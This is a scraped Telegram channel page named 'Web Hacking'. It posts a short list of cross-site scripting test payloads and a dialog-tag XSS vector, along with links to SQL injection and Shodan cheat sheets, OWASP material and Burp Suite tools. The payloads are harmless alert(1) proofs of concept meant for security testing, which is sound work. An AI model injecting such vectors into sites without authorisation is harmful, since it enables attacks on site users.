Web Hacking
@WebHacking
2.12K subscribers
52 photos
6 files
37 links
@OSCP_training
@pfsense
@WifiHacking
Download Telegram
About
Blog
Apps
Platform
Join
Web Hacking
2.12K subscribers
Web Hacking
Here's a small #XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:
- URL query, fragment & path;
- all input fields.
2.89K views
Web Hacking
3.02K views
Web Hacking
3.31K views
Web Hacking
https://ardern.io/2019/06/20/payload-bxss/
3.38K views
Web Hacking
3.5K views
Web Hacking
3.33K views
Web Hacking
https://github.com/jakejarvis/awesome-shodan-queries
3.49K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
https://apifriends.com/api-security/owasps-api-security/
Axway Blog
OWASP API Security: Top 10 Security Risks & Remedies
Learn about each vulnerability listed in the OWASP API Security Top 10, what it means for your organization, and how to mitigate each security risk.
2.69K views
Web Hacking
3.41K views
Web Hacking
https://portswigger.net/web-security/sql-injection/cheat-sheet
portswigger.net
SQL injection cheat sheet | Web Security Academy
This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that often arise when performing SQL ...
3.57K views
Web Hacking
Here's an updated polyglot that uses the details tag and now breaks out of template strings too.
3.57K views
Web Hacking
We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
3.87K views
Web Hacking
Channel photo updated
Web Hacking
https://www.udemy.com/course/ethical-hacker/
12.8K views
Web Hacking
88K views
Web Hacking
https://www.udemy.com/share/103pm8CEQbdV5aR3g=/
Udemy
Cyber Security: The Ultimate Beginner's Handbook
Best FIT with simple REALTIME Examples. Topic includes Parenting in Digital Age, Child's use, Cyber Crimes & Remedies.
❀1🀩1πŸ‘Œ1
98.6K views
Web Hacking
sri-check | A Burp Suite extension for identifying missing Subresource Integrity attributes.

https://github.com/PortSwigger/sri-check
3.87K views
Web Hacking
Free training on developing Burp Suite extensions

https://github.com/doyensec/burpdeveltraining
GitHub
GitHub - doyensec/burpdeveltraining: Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security…
Material for the training "Developing Burp Suite Extensions – From Manual Testing to Security Automation" - doyensec/burpdeveltraining
16.3K views
Web Hacking
Forwarded from πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
3.18K views
Web Hacking
Forwarded from πŸ’₯CEH trainingπŸ‘¨πŸ»β€πŸ’» βš”οΈ πŸ›‘
🐳1
3.29K views